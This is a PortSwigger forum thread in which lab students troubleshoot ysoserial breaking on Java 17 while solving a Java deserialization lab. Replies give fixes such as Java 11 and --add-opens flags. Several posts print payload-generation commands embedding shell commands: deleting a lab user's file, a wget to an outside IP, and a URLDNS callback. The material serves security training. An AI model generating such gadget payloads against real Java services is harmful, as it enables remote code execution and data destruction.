Burp Suite User Forum

ysoserial stopped working

Pietro | Last updated: Dec 07, 2021 10:34PM UTC

Hello. I already completed the lab "Exploiting Java deserialization with Apache Commons" weeks ago and now I wanted to do it again, but it doesn't work because I get a Java error when I execute ysoserial. Maybe it's because I installed the Deserialization Scanner plugin. I was looking at its tab and I saw that it says: "recent Java major version does not allow to run ysoserial properly", so I don't know what to do. Hopefully somebody knows what could be happening. Thanks. The Java error I get is:

```
java -jar ysoserial.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64
Error while generating or serializing payload
java.lang.IllegalAccessError: class ysoserial.payloads.util.Gadgets (in unnamed module @0xfe48b45) cannot access class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl (in module java.xml) because module java.xml does not export com.sun.org.apache.xalan.internal.xsltc.trax to unnamed module @0xfe48b45
	at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:102)
	at ysoserial.payloads.CommonsCollections4.getObject(CommonsCollections4.java:32)
	at ysoserial.payloads.CommonsCollections4.getObject(CommonsCollections4.java:26)
	at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
```

Ben, PortSwigger Agent | Last updated: Dec 08, 2021 10:33AM UTC

Hi Pietro, Which version of Java are you using to run ysoserial? I can replicate this if I use Java 16 or 17, but earlier versions seem to work as expected (I tested this successfully using Java versions 15 and 11).

Pietro | Last updated: Dec 08, 2021 02:39PM UTC

Thanks for your help. I'm using Java 17.0.1. I'm almost sure that I have not updated my java since I completed this lab for the first time. What should I do? Downgrade?

Uthman, PortSwigger Agent | Last updated: Dec 09, 2021 10:53AM UTC

Mihai | Last updated: May 17, 2022 11:16PM UTC

Hello, How can I download ysoserial.jar for this lab? And do I need Java in order to run this tool? If yes, how can I download and install Java, please? I do not have experience with Java; I've worked more in Python. Thank you!

Ben, PortSwigger Agent | Last updated: May 18, 2022 11:11AM UTC

Hi, ysoserial is available for download here: https://github.com/frohoff/ysoserial. As noted in the message above yours in this forum thread, you can obtain Java from the location below: https://jdk.java.net/archive/. The GitHub page also has a usage guide.

AlvinSmith | Last updated: Feb 14, 2023 09:16AM UTC

Hi Pietro and whoever else is worrying about using different versions,

Check this answer on stackoverflow: https://askubuntu.com/questions/740757/switch-between-multiple-java-versions

```bash
❯ java -jar ysoserial-all.jar CommonsBeanutils1 'wget 10.10.14.7' | base64 -w 0
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Error while generating or serializing payload
java.lang.IllegalAccessError: class ysoserial.payloads.util.Gadgets (in unnamed module @0x4015e7ec) cannot access class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl (in module java.xml) because module java.xml does not export com.sun.org.apache.xalan.internal.xsltc.trax to unnamed module @0x4015e7ec
	at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:102)
	at ysoserial.payloads.CommonsBeanutils1.getObject(CommonsBeanutils1.java:20)
	at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
❯ java --version
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
openjdk 17.0.6 2023-01-17
OpenJDK Runtime Environment (build 17.0.6+10-Debian-1)
OpenJDK 64-Bit Server VM (build 17.0.6+10-Debian-1, mixed mode, sharing)
❯ update-java-alternatives --list
java-1.11.0-openjdk-amd64      1111       /usr/lib/jvm/java-1.11.0-openjdk-amd64
java-1.17.0-openjdk-amd64      1711       /usr/lib/jvm/java-1.17.0-openjdk-amd64
❯ sudo update-java-alternatives --set /usr/lib/jvm/java-1.11.0-openjdk-amd64
```

Cheers,

MiX_FiX | Last updated: Mar 07, 2023 11:38AM UTC

Hello everybody, Recently I also completed the lab with insecure deserialization; however, now ysoserial is showing me this:

```
~ % java -jar ysoserial-all.jar CommonsCollections4 "test"
Error while generating or serializing payload
java.lang.IllegalAccessError: class ysoserial.payloads.util.Gadgets (in unnamed module @0x4a16581b) cannot access class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl (in module java.xml) because module java.xml does not export com.sun.org.apache.xalan.internal.xsltc.trax to unnamed module @0x4a16581b
	at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:102)
	at ysoserial.payloads.CommonsCollections4.getObject(CommonsCollections4.java:32)
	at ysoserial.payloads.CommonsCollections4.getObject(CommonsCollections4.java:26)
	at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
```

I have tried to install the JDK a few times, each time a different version. I've tried to download a new ysoserial; nothing changed. I am using macOS (Intel) and Kali Linux (through VirtualBox), and neither the Mac nor Kali wants to work. Please, help me..)

Ben, PortSwigger Agent | Last updated: Mar 08, 2023 07:50AM UTC

Hi, What versions of Java have you used when you attempt to run the ysoserial Jar file?

MiX_FiX | Last updated: Mar 09, 2023 11:28AM UTC

My dear sir or madam, Allow me to expound upon a matter that may be of great interest to you. Should you happen to be utilizing the macOS operating system, and have encountered an issue with the ysoserial program due to the error previously demonstrated, it would behoove you to note that ysoserial necessitates the utilization of Java 11 exclusively. In order to verify your Java version, kindly employ the following command:

```
% java --version
java 11.0.17 2022-10-18 LTS
Java(TM) SE Runtime Environment 18.9 (build 11.0.17+10-LTS-269)
Java HotSpot(TM) 64-Bit Server VM 18.9 (build 11.0.17+10-LTS-269, mixed mode)
```

Subsequently, to determine which Java versions are presently installed on your machine, kindly use the ensuing command:

```
% /usr/libexec/java_home -V
Matching Java Virtual Machines (5):
    19.0.2 (x86_64) "Oracle Corporation" - "Java SE 19.0.2" /Library/Java/JavaVirtualMachines/jdk-19.jdk/Contents/Home
    17.0.6 (x86_64) "Oracle Corporation" - "Java SE 17.0.6" /Library/Java/JavaVirtualMachines/jdk-17.jdk/Contents/Home
    11.0.17 (x86_64) "Oracle Corporation" - "Java SE 11.0.17" /Library/Java/JavaVirtualMachines/jdk-11.0.17.jdk/Contents/Home
    1.8.361.09 (x86_64) "Oracle Corporation" - "Java" /Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Home
    1.8.0_202 (x86_64) "Oracle Corporation" - "Java SE 8" /Library/Java/JavaVirtualMachines/jdk1.8.0_202.jdk/Contents/Home
/Library/Java/JavaVirtualMachines/jdk-19.jdk/Contents/Home
```

Upon completion of this step, you may select the appropriate Java version, which in our case would be Java 11.0.17, with the following command (the `java_home` call must be wrapped in command substitution so that its output, not the literal text, becomes the value of `JAVA_HOME`):

```
% export JAVA_HOME=$(/usr/libexec/java_home -v 11.0.17)
```

Et voilà! Your ysoserial program is now functioning as desired (one can only hope).

Nico | Last updated: Mar 22, 2023 06:09PM UTC

Hello, I would just like to mention that issue hasn't been fixed for recent java versions and creates great confusion when attempting to complete the practice exam using the ysoserial extension in burp suite.

Ben, PortSwigger Agent | Last updated: Mar 23, 2023 11:54AM UTC

Hi Nico, On a general note, we would expect users to already know how to use any external tools that they ultimately want to use during the exam (including how to set them up, pre-requisites etc).

Nico | Last updated: Apr 05, 2023 08:22AM UTC

Hey Ben, there are 250 exercises and, as the original poster pointed out, updating your Java version causes this particular exercise to break. You will continue to randomly get people reporting this bug, and occasionally an angry exam taker. Enjoy explaining it to them.

PortSwigger Agent | Last updated: Jun 05, 2023 09:16AM UTC

Hi, sorry for the delay, we will identify the best workaround for this issue and update the Academy learning materials to incorporate it.

PortSwigger Agent | Last updated: Jun 05, 2023 10:29AM UTC

You can make ysoserial work with modern Java for the gadget chains used in the Academy by specifying the following command line flags:

```
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED
--add-opens java.base/java.net=ALL-UNNAMED
--add-opens=java.base/java.util=ALL-UNNAMED
```

e.g.:

```
java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED -jar ysoserial-all.jar URLDNS https://collaborator-url-here/
```

Sharon | Last updated: Aug 22, 2023 03:06AM UTC

```
java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64
```

The lab solution needs to be updated with the code above. I have spent over 1hr trying to resolve the ysoserial issue and this is the code that worked for me. You need to update the Academy, so current students don't get stuck or frustrated when they get to the deserialization lab.

Florian | Last updated: Aug 24, 2023 10:37AM UTC

I too spent over 1 hour figuring this out. The problem is that the lab *seems* to have the correct hint, listing the --add-opens parameters, but if you look closely, they are in a different order. In the lab hint, it is listed as "java -jar --add-opens=xxx [...] ysoserial.jar". Notice that "-jar" is listed before the "--add-opens". This seems to conflict with ysoserial. If you change the order as mentioned by the PortSwigger Agent on Jun 05, ysoserial will work. It would be great if the labs get updated soon. After all, it's been a while since June 05...

Dominyque, PortSwigger Agent | Last updated: Aug 24, 2023 01:37PM UTC

Hi All We have had one of our users submit a video solution for this lab recently: https://www.youtube.com/watch?v=NAK_a324dco&list=PLGj3IZkhXGzL7SQII47kmo9OO3wsFPaVv&index=4 I hope this helps.
